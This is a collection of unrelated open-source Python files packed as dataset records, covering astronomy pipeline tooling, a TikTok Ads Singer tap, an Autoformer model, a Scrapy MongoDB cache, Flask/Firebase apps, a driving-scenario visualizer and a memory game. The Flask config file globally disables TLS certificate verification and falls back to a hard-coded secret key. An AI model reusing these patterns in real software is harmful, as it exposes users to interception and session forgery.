#shutil.copy2(jwst_uncal_file, jwst_uncal_file+'.tmp')\n #with datamodels.open(jwst_uncal_file+'.tmp') as model:\n # if model.meta.exposure.type in ['NRS_MSATA', 'NRS_TACONFIRM']:\n # model.meta.exposure.type = 'NRS_MSASPEC'\n # #pipeline_object._precache_references(model) # this will also fail\n # ovr_refs = {reftype: pipeline_object.get_ref_override(reftype) \n # for reftype in pipeline_object.reference_file_types \n # if pipeline_object.get_ref_override(reftype) is not None}\n # fetch_types = sorted(set(pipeline_object.reference_file_types) - set(ovr_refs.keys()))\n # for key in ['sflat', 'area']:\n # if key in fetch_types:\n # fetch_types.remove(key)\n # logger.info(\"Prefetching reference files for dataset: \" + repr(model.meta.filename) +\n # \" reftypes = \" + repr(fetch_types)) # following \"stpipe/pipeline.py\"\n # crds_refs = crds_client.get_multiple_reference_paths(\n # model.get_crds_parameters(), \n # fetch_types, \n # model.crds_observatory\n # )\n #os.remove(jwst_uncal_file+'.tmp')\n \n \n logger.info('Spec3Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n pipeline_object = calwebb_spec3.Spec3Pipeline()\n pipeline_object._precache_references(jwst_uncal_file) # this will fail\n # \n #shutil.copy2(jwst_uncal_file, jwst_uncal_file+'.tmp')\n # with datamodels.open(jwst_uncal_file+'.tmp') as model:\n # if model.meta.exposure.type in ['NRS_MSATA', 'NRS_TACONFIRM']:\n # model.meta.exposure.type = 'NRS_MSASPEC'\n # #pipeline_object._precache_references(model) # this will also fail\n # ovr_refs = {reftype: pipeline_object.get_ref_override(reftype) \n # for reftype in pipeline_object.reference_file_types \n # if pipeline_object.get_ref_override(reftype) is not None}\n # fetch_types = sorted(set(pipeline_object.reference_file_types) - set(ovr_refs.keys()))\n # for key in ['area']:\n # if key in fetch_types:\n # fetch_types.remove(key)\n # logger.info(\"Prefetching reference files for dataset: \" + repr(model.meta.filename) +\n # \" reftypes = \" + repr(fetch_types)) # following \"stpipe/pipeline.py\"\n # crds_refs = crds_client.get_multiple_reference_paths(\n # model.get_crds_parameters(), \n # fetch_types, \n # model.crds_observatory\n # )\n # ref_path_map = dict(list(crds_refs.items()) + list(ovr_refs.items()))\n # for (reftype, refpath) in sorted(ref_path_map.items()):\n # how = \"Override\" if reftype in ovr_refs else \"Prefetch\"\n # logger.info(f\"{how} for {reftype.upper()} reference file is '{refpath}'.\")\n # crds_client.check_reference_open(refpath)\n # os.remove(jwst_uncal_file+'.tmp')\n \n \n \n \n # create a timestamp file\n if os.path.dirname(jwst_uncal_file) == 'uncals':\n timestamp_file = os.path.dirname(os.path.dirname(jwst_uncal_file))+os.sep+'crds_cached'\n timestamp_str = datetime.datetime.now().strftime('%Y-%m-%d %Hh%Mm%Ss')\n with open(timestamp_file, 'w') as fp:\n fp.write(timestamp_str+'\\n')\n \n\n\n\n\n# Main\nif __name__ == '__main__':\n \n main()\n\n\n\n","repo_name":"1054/Crab.Toolkit.JWST","sub_path":"bin/go-jwst-spectroscopy-precache-crds-reference-files.py","file_name":"go-jwst-spectroscopy-precache-crds-reference-files.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42837522206","text":"#!/usr/bin/env python3\nimport os\nimport json\nimport backoff\nimport requests\nimport arrow\nimport singer\nfrom singer import utils, metadata\nfrom singer.catalog import Catalog, CatalogEntry\nfrom singer.schema import Schema\nfrom singer.transform import transform\nfrom six import string_types\nfrom six.moves.urllib.parse import urlencode, urlunparse\n\nREQUIRED_CONFIG_KEYS = [\"advertiser_id\", \"report_type\", \"start_date\", \"token\"]\nLOGGER = singer.get_logger()\nHOST = \"ads.tiktok.com\"\nPATH = \"/open_api/v1.2/reports/integrated/get\"\n\n\nclass TiktokError(Exception):\n def __init__(self, msg, code):\n self.msg = msg\n self.code = code\n super().__init__(self.msg)\n\n\ndef giveup(exc):\n \"\"\"\n code 40100 shows rate limit reach error\n it will give up on retry operation, if code is not 40100\n \"\"\"\n return exc.code != 40100\n\n\ndef get_abs_path(path):\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), path)\n\n\ndef load_schemas():\n \"\"\" Load schemas from schemas folder \"\"\"\n schemas = {}\n for filename in os.listdir(get_abs_path('schemas')):\n path = get_abs_path('schemas') + '/' + filename\n file_raw = filename.replace('.json', '')\n with open(path) as file:\n schemas[file_raw] = Schema.from_dict(json.load(file))\n return schemas\n\n\ndef build_url(path, query=\"\"):\n # type: (str, str) -> str\n \"\"\"\n Build request URL\n :param path: Request path\n :param query: Querystring\n :return: Request URL\n \"\"\"\n scheme, netloc = \"https\", HOST\n return urlunparse((scheme, netloc, path, \"\", query, \"\"))\n\n\ndef create_metadata_for_report(schema):\n mdata = [{\"breadcrumb\": [], \"metadata\": {\"inclusion\": \"available\"}}]\n for key in schema.properties:\n # hence when property is object, we will only consider properties of that object without taking object itself.\n if \"object\" in schema.properties.get(key).type:\n inclusion = \"available\" if key != \"dimensions\" else \"automatic\"\n mdata.extend(\n [{\"breadcrumb\": [\"properties\", key, \"properties\", prop], \"metadata\": {\"inclusion\": inclusion}} for prop\n in schema.properties.get(key).properties])\n else:\n mdata.append({\"breadcrumb\": [\"properties\", key], \"metadata\": {\"inclusion\": \"available\"}})\n\n return mdata\n\n\ndef discover():\n raw_schemas = load_schemas()\n streams = []\n for stream_id, schema in raw_schemas.items():\n stream_metadata = create_metadata_for_report(schema)\n key_properties = []\n streams.append(\n CatalogEntry(\n tap_stream_id=stream_id,\n stream=stream_id,\n schema=schema,\n key_properties=key_properties,\n metadata=stream_metadata\n )\n )\n return Catalog(streams)\n\n\n@backoff.on_exception(backoff.expo, TiktokError, max_tries=5, giveup=giveup, factor=2)\n@utils.ratelimit(10, 1)\ndef make_request(url, headers):\n response = requests.get(url, headers=headers)\n code = response.json().get(\"code\")\n if code != 0:\n LOGGER.error('Return Code = %s', code)\n raise TiktokError(response.json().get(\"message\", \"an error occurred while calling API\"), code)\n\n return response\n\n\ndef request_data(attr, headers):\n page = 1\n total_page = 1\n all_items = []\n\n # do pagination\n while page <= total_page:\n attr[\"page\"] = page\n\n query_string = urlencode({k: v if isinstance(v, string_types) else json.dumps(v) for k, v in attr.items()})\n url = build_url(PATH, query_string)\n response = make_request(url, headers=headers)\n\n data = response.json().get(\"data\", {})\n all_items += data.get(\"list\", [])\n\n page = data.get(\"page_info\", {}).get(\"page\", 1) + 1\n total_page = data.get(\"page_info\", {}).get(\"total_page\", 1)\n return all_items\n\n\ndef sync(config, state, catalog):\n \"\"\" Sync data from tap source \"\"\"\n # Loop over selected streams in catalog\n for stream in catalog.get_selected_streams(state):\n LOGGER.info(\"Syncing stream:\" + stream.tap_stream_id)\n\n bookmark_column = \"stat_time_day\"\n mdata = metadata.to_map(stream.metadata)\n schema = stream.schema.to_dict()\n\n singer.write_schema(\n stream_name=stream.tap_stream_id,\n schema=schema,\n key_properties=stream.key_properties,\n )\n\n headers = {\"Access-Token\": config[\"token\"]}\n attr = {\n \"advertiser_id\": config[\"advertiser_id\"],\n \"report_type\": config[\"report_type\"],\n \"data_level\": \"AUCTION_\" + stream.tap_stream_id.replace(\"_id_report\", \"\").upper(),\n \"dimensions\": [stream.tap_stream_id.replace(\"_report\", \"\"), \"stat_time_day\"],\n \"lifetime\": False,\n \"page_size\": 200\n }\n\n start_date = singer.get_bookmark(state, stream.tap_stream_id, bookmark_column).split(\" \")[0] \\\n if state.get(\"bookmarks\", {}).get(stream.tap_stream_id) else config[\"start_date\"]\n\n while True:\n attr[\"start_date\"] = attr[\"end_date\"] = start_date # as both date are in closed interval\n LOGGER.info(\"Querying Date --> %s\", attr[\"start_date\"])\n tap_data = request_data(attr, headers)\n\n bookmark = attr[\"start_date\"]\n with singer.metrics.record_counter(stream.tap_stream_id) as counter:\n for row in tap_data:\n # Type Conversation and Transformation\n transformed_data = transform(row, schema, metadata=mdata)\n\n # write one or more rows to the stream:\n singer.write_records(stream.tap_stream_id, [transformed_data])\n counter.increment()\n bookmark = max([bookmark, row[\"dimensions\"][bookmark_column]])\n\n state = singer.write_bookmark(state, stream.tap_stream_id, bookmark_column, bookmark)\n singer.write_state(state)\n\n if start_date < str(arrow.utcnow().date()):\n start_date = str(arrow.get(start_date).shift(days=1).date())\n if bookmark >= str(arrow.utcnow().date()):\n break\n\n return\n\n\n@utils.handle_top_exception(LOGGER)\ndef main():\n # Parse command line arguments\n args = utils.parse_args(REQUIRED_CONFIG_KEYS)\n\n # If discover flag was passed, run discovery mode and dump output to stdout\n if args.discover:\n catalog = discover()\n catalog.dump()\n # Otherwise run in sync mode\n else:\n if args.catalog:\n catalog = args.catalog\n else:\n catalog = discover()\n state = args.state or {}\n sync(args.config, state, catalog)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yashdabhi078/tap-tiktok","sub_path":"tap_tiktok/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73893551204","text":"from torch import nn\r\n\r\nfrom layers.Embedding import PositionalEmbedding\r\nfrom layers.AutoCorrelation import AutoCorrection, AutoCorrelationLayer\r\nfrom layers.AutoformerEncoder import Encoder, EncoderLayer, SeriesDecomposition\r\n\r\n\r\nclass Model(nn.Module):\r\n \"\"\"\r\n Autoformer is the first method to achieve the series-wise connection,\r\n with inherent O(LlogL) complexity\r\n \"\"\"\r\n def __init__(self, configs):\r\n super(Model, self).__init__()\r\n self.decomp = SeriesDecomposition(configs.moving_avg)\r\n self.enc_embedding = PositionalEmbedding(configs.d_model)\r\n self.encoder = Encoder(\r\n [\r\n EncoderLayer(\r\n AutoCorrelationLayer(AutoCorrection(configs.factor, configs.dropout),\r\n configs.d_model, configs.n_heads),\r\n configs.d_model,\r\n configs.d_ff,\r\n moving_avg=configs.moving_avg,\r\n dropout=configs.dropout,\r\n activation=configs.activation\r\n ) for _ in range(configs.e_layers)\r\n ]\r\n )\r\n self.projection = nn.Linear(configs.seq_len * configs.d_model, configs.c_out, bias=True)\r\n\r\n def forward(self, x):\r\n enc_out = x + self.enc_embedding(x)\r\n enc_out = self.encoder(enc_out)\r\n B, _, _ = enc_out.shape\r\n enc_out = self.projection(enc_out.view(B, -1))\r\n return enc_out\r\n","repo_name":"Allaniiibigdevil/Master-Arbeit","sub_path":"models/Autoformer.py","file_name":"Autoformer.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38941355804","text":"import bson\nimport logging\nfrom time import time\nfrom pymongo import MongoClient\n\nfrom scrapy.responsetypes import responsetypes\nfrom scrapy.http import Headers\nfrom scrapy.utils.request import request_fingerprint\nfrom . import Config\nfrom .util import convert\n\nclass MongoCacheStorage(object):\n def __init__(self, settings):\n self.settings = settings\n self.config = Config(settings)\n self.expiration_secs = settings.getint('HTTPCACHE_EXPIRATION_SECS')\n self.logger = logging.getLogger(__name__)\n\n def open_spider(self, spider):\n self.clt = MongoClient(self.config.host)\n self.db = self.clt[self.config.database_name()]\n self.col = self.db['cache']\n\n def close_spider(self, spider):\n self.clt.close()\n\n def retrieve_response(self, spider, request):\n \"\"\"Return response if present in cache, or None otherwise.\"\"\"\n key = self._request_key(request)\n\n data = self.col.find_one({'key': key})\n if not data: # not cache\n return \n\n # expiration?\n mtime = data['meta']['timestamp']\n if 0 < self.expiration_secs < time() - float(mtime):\n return # expired\n \n # retrieve\n body = data['response_body']\n url = str(data.get('url'))\n status = data['meta']['status']\n headers = Headers(data['response_headers'])\n respcls = responsetypes.from_args(headers=headers, url=url)\n response = respcls(url=url, headers=headers, status=status, body=body)\n return response\n\n def store_response(self, spider, request, response):\n \"\"\"Store the given response in the cache.\"\"\"\n key = self._request_key(request)\n data = {\n 'url': request.url,\n 'key': key,\n 'meta' : {\n 'url': request.url,\n 'method': request.method,\n 'status': response.status,\n 'response_url': response.url,\n 'timestamp': time(),\n },\n 'response_headers' : convert(response.headers),\n 'response_body': bson.binary.Binary(response.body),\n 'request_headers' : convert(request.headers),\n 'request_body': bson.binary.Binary(request.body)\n }\n #self.logger.info(request.url)\n #self.logger.info(data)\n self.col.update({'key': key}, data, upsert=True)\n\n def _request_key(self, request):\n return str(request_fingerprint(request))\n\n\n\n\n\nfrom scrapy.dupefilters import BaseDupeFilter\nfrom scrapy.utils.request import request_fingerprint\nfrom . import Config\n\nclass CacheDupeFilter(BaseDupeFilter):\n \"\"\"DupeFilter which can be used wth MongoCacheStorage\"\"\"\n\n def __init__(self, settings, debug=False):\n self.config = Config(settings)\n self.debug = debug\n self.logger = logging.getLogger(__name__)\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls.from_settings(crawler.settings)\n\n @classmethod\n def from_settings(cls, settings):\n debug = settings.getbool('DUPEFILTER_DEBUG')\n return cls(settings, debug)\n\n def request_seen(self, request):\n fp = request_fingerprint(request)\n return self.col.count({'key': fp }) > 0\n \n def open(self):\n self.clt = MongoClient(self.config.host)\n self.db = self.clt[self.config.database_name()]\n self.col = self.db['cache']\n self.logger.debug(\"%s:%s %s\" % (type(self).__name__, '__init___', [self.config, self.clt, self.db]))\n\n def close(self, reason):\n \"\"\"Delete data on close. Called by scrapy's scheduler\"\"\"\n self.clt.close()\n\n def clear(self):\n \"\"\"Clears fingerprints data\"\"\"\n self.server.delete(self.key)\n","repo_name":"roadt/scrapymongo","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42880024296","text":"import os\n\nfrom flask import Flask, g, current_app\nimport jinja2\nfrom envio_email_api.metrics import Metrics\nfrom flask_login import LoginManager\nfrom collections import OrderedDict\n\ntry:\n # Due: https://www.python.org/dev/peps/pep-0476\n import ssl\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\n else:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\nexcept ImportError:\n pass\n\n\n\nmetrics = Metrics()\n\n\ndef create_app(**config):\n \"\"\"\n Create a EnvioEmailApi app\n :param config:\n :return: EnvioEmailApi app\n \"\"\"\n app = Flask(__name__, static_folder=None)\n app.config.from_envvar('EnvioEmailApi_SETTINGS', silent=True)\n app.config.update(config)\n\n if not app.config['SECRET_KEY']:\n app.config['SECRET_KEY'] = '343234234324234234344342423'\n\n if 'LOG_LEVEL' not in app.config:\n app.config['LOG_LEVEL'] = 'DEBUG'\n\n configure_login(app)\n configure_babel(app)\n configure_api(app)\n configure_backend(app)\n configure_metrics(app)\n configure_json_encoder(app)\n configure_cors(app)\n\n return app\n\n\ndef configure_api(app):\n \"\"\"\n Configure diffenrend API endpoints\n :param app: Flask application\n :return:\n \"\"\"\n from envio_email_api.api import EnvioEmailApi\n from envio_email_api.api import resources\n\n api = EnvioEmailApi(prefix='/api/v1')\n\n # Default Resources\n resources_index = OrderedDict([(r[1], r) for r in resources])\n\n # Custom packages resources\n import importlib\n import pkg_resources\n importlib.reload(pkg_resources)\n\n from pkg_resources import working_set\n\n templates_loader = [app.jinja_loader]\n\n\n\n app.jinja_loader = jinja2.ChoiceLoader(templates_loader)\n\n for resource in resources_index.values():\n print('Loading resource {} in {}'.format(\n resource[0], resource[1]\n ))\n api.add_resource(*resource)\n\n api.init_app(app)\n\n\ndef setup_backend_conn():\n try:\n import firebase_admin\n from firebase_admin import credentials\n from firebase_admin import firestore\n\n # Use a service account\n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filename = os.path.join(fileDir, 'envio_email_api/clave.json')\n\n cred = credentials.Certificate(filename)\n try:\n\n firebase_admin.initialize_app(cred)\n g.backend_cnx = firestore.client()\n except:\n g.backend_cnx = firestore.client()\n\n\n\n except Exception as exc:\n current_app.logger.critical(\"ERROR setting up backend: {}\".format(exc))\n\ndef noquote(s):\n return s\n\ndef configure_backend(app):\n app.before_request(setup_backend_conn)\n\n\ndef configure_metrics(app):\n metrics.init_app(app)\n\n\ndef configure_login(app):\n from envio_email_api.login import load_user_from_header, load_user, CustomSessionInterface\n login_manager = LoginManager()\n login_manager.init_app(app)\n # Add request loader callback\n login_manager.request_loader(load_user_from_header)\n login_manager.user_loader(load_user)\n app.session_interface = CustomSessionInterface()\n\n\ndef configure_babel(app):\n \"\"\"Configure Babel for app\n \"\"\"\n if 'BABEL_DEFAULT_LOCALE' not in app.config:\n app.config['BABEL_DEFAULT_LOCALE'] = 'es'\n app.config['BABEL_TRANSLATION_DIRECTORIES'] = 'translations'\n\n\n\n\ndef configure_json_encoder(app):\n from envio_email_api.utils import CustomJSONEncoder\n app.json_encoder = CustomJSONEncoder\n\n\ndef configure_cors(app):\n from flask_cors import CORS\n cors = CORS(origins=['*'])\n cors.init_app(app)\n\n","repo_name":"al118345/envio_email_api_python","sub_path":"envio_email_api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34735949678","text":"import pandas as pd\nimport firebase_admin\nfrom firebase_admin import firestore\n\napp = firebase_admin.initialize_app()\ndb = firestore.client()\n\ndf = pd.read_csv('output.csv')\ndf = df.fillna('')\ndata = df.to_dict('records')\nprint('Length of data:', data)\nres = []\n\nFOOD_COLLECTION = 'food'\n\nfor rec in data:\n name = rec.get('name').lower()\n del rec['name']\n print(name)\n doc_ref = db.collection(FOOD_COLLECTION).document(name)\n doc_ref.set(rec)\n","repo_name":"AbhinaavRamesh/PennApps","sub_path":"scripts/upload_food_data.py","file_name":"upload_food_data.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9993784376","text":"import os\nimport sys\nimport cv2\nimport json\nimport glob\nimport math\nimport torch\nimport argparse\nsys.path.append(os.getcwd())\n\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom PIL import ImageDraw, Image\n\nfrom proxy_simulator.renderer import BaseRenderer\nfrom proxy_simulator.carla_wrapper import CarlaWrapper\n\n\nGPU_PI = torch.tensor([np.pi], device=\"cuda\", dtype=torch.float32)\nBB_EXTENT = torch.tensor([[0.90,2.20],[0.90,-2.20],[-0.90, -2.20],[-0.90, 2.20]]).cuda()\n\n\nclass BEVVisualizer:\n def __init__(self, args):\n \"\"\"\n \"\"\"\n self.args = args\n self.carla_wrapper = CarlaWrapper(args)\n\n self.log_file_paths, self.results_file_paths = self.parse_scenario_log_dir()\n\n self.town = None\n self.max_iter = self.fetch_max_iter()\n\n def visualize(self):\n \"\"\"\n Visualizes logs in a simple abstract BEV representation that is centered\n on the ego agent. Can dump .gifs or .mp4s.\n \"\"\"\n # loop over all logs\n for log_path, results_path in tqdm(\n zip(self.log_file_paths, self.results_file_paths), total=len(self.log_file_paths)\n ):\n log = self.parse_json_file(log_path)\n results = self.parse_json_file(results_path)\n\n # extract meta data\n name = log[\"meta_data\"][\"name\"]\n town = log[\"meta_data\"][\"town\"]\n density = log_path.split(\"/\")[1].split(\"_\")[-1]\n critical_iter = results[\"first_metrics\"][\"iteration\"]\n\n if self.args.opt_iter == -1:\n if critical_iter <= self.max_iter[density][town]:\n opt_iter = critical_iter\n else:\n opt_iter = self.max_iter[density][town]\n else:\n opt_iter = self.args.opt_iter\n \n # set town in relevant components if necessary\n if town != self.town:\n global_map, map_offset = self.carla_wrapper._initialize_from_carla(town)\n renderer = BaseRenderer(\n self.args, map_offset, global_map.shape[2:4], viz=True\n )\n\n bev_overview_vis_per_t = []\n for t, state in enumerate(log[\"states\"][opt_iter]):\n # map dict of lists to dict of tensors\n for substate in state:\n state[substate] = torch.tensor(\n state[substate],\n device=self.args.device,\n )\n\n # fetch local crop of map\n local_map = renderer.get_local_birdview(\n global_map,\n state[\"pos\"].unsqueeze(0)[:, 0:1], # ego pos as origin\n state[\"yaw\"].unsqueeze(0)[:, 0:1], # ego yaw as reference\n )\n\n vehicle_corners = self.get_corners_vectorized(\n BB_EXTENT,\n state[\"pos\"].unsqueeze(0),\n state[\"yaw\"].unsqueeze(0),\n )\n\n vehicle_corners = renderer.world_to_pix_crop(\n vehicle_corners, \n state[\"pos\"].unsqueeze(0)[:, 0:1], # ego pos as origin\n state[\"yaw\"].unsqueeze(0)[:, 0:1], # ego yaw as reference\n )\n\n vehicle_corners = vehicle_corners.detach().cpu().numpy()\n vehicle_corners = vehicle_corners[0].reshape(vehicle_corners.shape[1]//4,4,2)\n\n bev_vis = self.tensor_to_pil(local_map)\n bev_overview_vis_draw = ImageDraw.Draw(bev_vis)\n\n for i in range(vehicle_corners.shape[0]):\n if i == 0:\n bev_overview_vis_draw.polygon(vehicle_corners[i].flatten(),fill=(222, 112, 97),outline=(0, 0, 0))\n bev_overview_vis_draw.polygon(np.concatenate([vehicle_corners[i][2], vehicle_corners[i][1], np.mean(vehicle_corners[i], axis=0)]),outline=(0, 0, 0))\n else:\n bev_overview_vis_draw.polygon(vehicle_corners[i].flatten(),fill=(105, 156, 219),outline=(0, 0, 0))\n bev_overview_vis_draw.polygon(np.concatenate([vehicle_corners[i][2], vehicle_corners[i][1], np.mean(vehicle_corners[i], axis=0)]),outline=(0, 0, 0))\n\n bev_overview_vis_per_t.append(bev_vis)\n \n save_path = os.path.join(os.path.dirname(log_path), name + f\"_iter_{opt_iter}\")\n\n # save frames as gif\n bev_overview_vis_per_t[0].save(\n save_path + '.gif', \n save_all=True, \n append_images=bev_overview_vis_per_t[1:], \n optimize=True,\n loop=0,\n )\n\n # save frames as .mp4\n # codec = cv2.VideoWriter_fourcc(*'mp4v') \n # video_writer = cv2.VideoWriter(save_path + \".mp4\",codec, 4, bev_overview_vis_per_t[0].size) \n # for timestep in range(len(log[\"states\"])):\n # video_writer.write(cv2.cvtColor(\n # np.array(bev_overview_vis_per_t[timestep]), cv2.COLOR_RGB2BGR))\n # video_writer.release()\n\n def tensor_to_pil(self, grid):\n \"\"\"\n \"\"\"\n colors = [\n (120, 120, 120), # road\n (253, 253, 17), # lane\n (0, 0, 142), # vehicle\n ]\n \n grid = grid.detach().cpu()\n\n grid_img = np.zeros((grid.shape[2:4] + (3,)), dtype=np.uint8)\n grid_img[...] = [225, 225, 225]\n \n for i in range(len(colors)):\n grid_img[grid[0, i, ...] > 0] = colors[i]\n\n pil_img = Image.fromarray(grid_img)\n\n return pil_img\n\n def get_corners_vectorized(self, extent, pos, yaw):\n yaw = GPU_PI/2 -yaw\n extent = extent.unsqueeze(-1)\n\n rot_mat = torch.cat(\n [\n torch.cos(yaw), torch.sin(yaw),\n -torch.sin(yaw), torch.cos(yaw),\n ],\n dim=-1,\n ).view(yaw.size(1), 1, 2, 2).expand(yaw.size(1), 4, 2, 2)\n\n rotated_corners = rot_mat @ extent\n\n rotated_corners = rotated_corners.view(yaw.size(1), 4, 2) + pos[0].unsqueeze(1)\n \n return rotated_corners.view(1, -1, 2)\n\n def fetch_max_iter(self):\n # read timings dict from json file\n with open('tools/timings.json') as f:\n timings = json.load(f)\n\n max_iter = {}\n max_GPU_seconds = 180\n for density in [\"1\", \"2\", \"4\"]:\n timings_per_town_per_density = timings[self.args.optim_method][density]\n max_iter[density] = {} \n for town, timing in timings_per_town_per_density.items():\n max_iter[density][str(town)] = math.floor(max_GPU_seconds / timing)\n return max_iter\n \n def parse_scenario_log_dir(self):\n \"\"\"\n Parse generation results directory and gather \n the JSON file paths from the per-route directories.\n \"\"\"\n route_scenario_dirs = sorted(\n glob.glob(\n self.args.scenario_log_dir + \"/**/RouteScenario*/\", recursive=True\n ),\n key=lambda path: (path.split(\"_\")[-6]),\n )\n\n # gather all records and results JSON files\n results_files = []\n records_files = []\n for dir in route_scenario_dirs:\n results_files.extend(\n sorted(\n glob.glob(dir + \"results.json\")\n )\n )\n records_files.extend(\n sorted(\n glob.glob(dir + \"scenario_records.json\")\n )\n )\n\n return records_files, results_files\n\n def parse_json_file(self, records_file):\n \"\"\"\n \"\"\"\n return json.loads(open(records_file).read())\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n vizualizer = BEVVisualizer(args)\n vizualizer.visualize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\n \"--scenario_log_dir\",\n type=str,\n default=\"generation_results\",\n help=\"The directory containing the per-route directories with the \"\n \"corresponding scenario log .json files.\",\n )\n parser.add_argument(\n \"--opt_iter\",\n type=int,\n default=-1,\n help=\"Specifies at which iteration in the optimization process the \"\n \"scenarios should be visualized. Set to -1 to automatically \"\n \"select the critical perturbation for each scenario.\",\n )\n parser.add_argument(\n \"--optim_method\",\n default=\"Adam\",\n choices=[\"Adam\", \"Both_Paths\"]\n )\n parser.add_argument(\n \"--device\",\n type=str,\n default=\"cuda\",\n )\n parser.add_argument(\n \"--port\",\n type=int,\n default=2000,\n help=\"Carla port.\"\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=1,\n help=\"The number of parallel simulations.\"\n )\n\n args = parser.parse_args()\n\n main(args)","repo_name":"autonomousvision/king","sub_path":"tools/visualize_scenarios.py","file_name":"visualize_scenarios.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"11009942640","text":"\"\"\"Memory, puzzle game of number pairs.\n\nExercises:\n\n1. Count and print how many taps occur.\n2. Decrease the number of tiles to a 4x4 grid.\n3. Detect when all tiles are revealed.\n4. Center single-digit tile.\n5. Use letters instead of tiles.\n\"\"\"\n\nfrom random import *\nfrom turtle import *\n\nfrom freegames import path\n\ncar = path('car.gif')\ntiles = list(range(32)) * 2\nstate = {'mark': None}\nhide = [True] * 64\ntaps =0 # create a variable for counting the taps \ncomplete = 0 # create a variable for counting if it finish making pairs\n\n\ndef square(x, y):\n \"\"\"Draw white square with black outline at (x, y).\"\"\"\n up()\n goto(x, y)\n down()\n color('black', 'white')\n begin_fill()\n for count in range(4):\n forward(50)\n left(90)\n end_fill()\n\n\ndef index(x, y):\n \"\"\"Convert (x, y) coordinates to tiles index.\"\"\"\n return int((x + 200) // 50 + ((y + 200) // 50) * 8)\n\n\ndef xy(count):\n \"\"\"Convert tiles count to (x, y) coordinates.\"\"\"\n return (count % 8) * 50 - 200, (count // 8) * 50 - 200\n\n\ndef tap(x, y):\n \"\"\"Update mark and hidden tiles based on tap.\"\"\"\n global taps, complete # globalize the variables so it don't mistake it with the inicial \n spot = index(x, y)\n mark = state['mark']\n taps +=1 # add a tap\n print('Taps: ', taps) # print in the terminal the count of taps \n\n if mark is None or mark == spot or tiles[mark] != tiles[spot]:\n state['mark'] = spot\n else:\n hide[spot] = False\n hide[mark] = False\n state['mark'] = None\n complete +=1 # add a pair completed \n\n if complete == 32:\n print('You Win!!!') # print if you win if you completed the 32 pairs \n\ndef draw():\n \"\"\"Draw image and tiles.\"\"\"\n clear()\n goto(0, 0)\n shape(car)\n stamp()\n\n for count in range(64):\n if hide[count]:\n x, y = xy(count)\n square(x, y)\n\n mark = state['mark']\n\n if mark is not None and hide[mark]:\n x, y = xy(mark)\n up()\n goto(x + 2, y)\n color('black')\n write(tiles[mark], font=('Arial', 30, 'normal'))\n\n update()\n ontimer(draw, 100)\n\n\nshuffle(tiles)\nsetup(420, 420, 370, 0)\naddshape(car)\nhideturtle()\ntracer(False)\nonscreenclick(tap)\ndraw()\ndone()","repo_name":"cBarredez/TC1001S","sub_path":"videojuegos/juegoMemory/Memory_edit.py","file_name":"Memory_edit.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72450644646","text":"from flask import Blueprint, jsonify, request\nfrom flask_cors import cross_origin\n\nfrom app.repository.default_ner_tag_repository import DefaultNerTagRepository\nfrom app.repository.spacy_tokenizer_repository import SpacyTokenizerRepository\nfrom app.repository.annotation_span_dataset_tag_repository import AnnotationSpanDatasetTagRepository\nfrom app.repository.document_repository import DocumentRepository\nfrom app.repository.annotation_span_repository import AnnotationSpanRepository\nfrom app.service.annotation_span_dataset_tag_service import AnnotationSpanDatasetTagService\nfrom app.service.document_service import DocumentService\nfrom app.service.utilities import Utilities\nfrom app.repository.dataset_tag_repository import DatasetTagRepository\n\ndocuments = Blueprint('routes', __name__)\n\ntokenizerRepository = SpacyTokenizerRepository()\nnerTagRepository = DefaultNerTagRepository(tokenizerRepository)\ndocumentService = DocumentService(DocumentRepository(), AnnotationSpanRepository())\nannotationSpanDatasetTagService = AnnotationSpanDatasetTagService(AnnotationSpanDatasetTagRepository(), AnnotationSpanRepository(), DatasetTagRepository())\n\n# /api/document\n@documents.route('/', methods=['GET'])\n@cross_origin(origin='*')\ndef get_all():\n document = documentService.get_all()\n\n return jsonify(Utilities.serialize_list(document))\n\n\n@documents.route('/', methods=['GET'])\n@cross_origin(origin='*')\ndef get_by_id(id):\n datasetFilter = request.args.get(\"datasets\")\n sourceFilter = request.args.get(\"sources\")\n document = documentService.get_by_id(id)\n annotation_spans = annotationSpanDatasetTagService.find_by_document(id, datasetFilter, sourceFilter)\n tokens = nerTagRepository.annotation_spans_to_ner_array(document.text, annotation_spans)\n # datasets = Null\n\n response = {\n \"document\": document.serialized,\n \"tokens\": Utilities.serialize_list(tokens)\n }\n\n return jsonify(response)\n\n@documents.route('/sources', methods=['GET'])\n@cross_origin(origin='*')\ndef get_all_sources():\n sources = annotationSpanDatasetTagService.get_all_sources()\n\n return jsonify(list(map(lambda s: s[0], sources)))\n\n@documents.route('/', 